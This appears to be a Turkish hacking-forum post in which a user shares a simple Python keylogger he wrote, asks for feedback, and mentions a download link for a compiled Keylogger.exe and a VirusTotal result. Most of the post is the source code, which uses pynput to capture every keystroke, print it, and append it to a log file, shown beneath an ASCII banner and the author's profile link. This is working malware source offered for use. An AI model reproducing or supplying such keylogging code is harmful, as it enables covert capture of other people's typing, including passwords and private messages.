Selamlar TurkHackTeam Ailesi
Bugün Sizlere Basit Bir Keylogger Yazdım
Görüş Ve Önerilerinizi Bekliyorum
Python:
from pynput import keyboard
import time
import colorama
from colorama import Fore , Back , Style
colorama.init(autoreset=True)
print(Fore.YELLOW + "<---------------TurkHackTeam--------------->")
print(" ")
print(Fore.LIGHTGREEN_EX +"###### ## ###### ###### ######")
print(Fore.LIGHTGREEN_EX +"## ## ## ## ## ## ## ##")
print(Fore.LIGHTGREEN_EX +"## ## ## ## ## ## ## ##")
print(Fore.LIGHTGREEN_EX +"###### ## ###### ## ## ## ##")
print(Fore.LIGHTGREEN_EX +"## ## ## ## ## ## ## ##")
print(Fore.LIGHTGREEN_EX +"## ## ## ## ## ## ## ##")
print(Fore.LIGHTGREEN_EX +"## ###### ## ## ###### ######")
print(Style.RESET_ALL)
print(Fore.LIGHTRED_EX +"https://www.turkhackteam.org/uye/fladd.1013298/")
def on_press(key):
try:
with open("key_log.txt", "a") as log_file:
log_file.write(f"{key.char} tuşuna basıldı\n")
print(f"{key.char} tuşuna basıldı")
except AttributeError:
with open("key_log.txt", "a") as log_file:
log_file.write(f"{key} tuşuna basıldı\n")
print(f"{key} tuşuna basıldı")
def main():
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
if __name__ == "__main__":
main()
İndirme Linki
VirusTotal
Not: Keylogger.exe dosyası sadece gösterim amaclı yapılmıştır o yüzden başta imza kısmına takılmayın


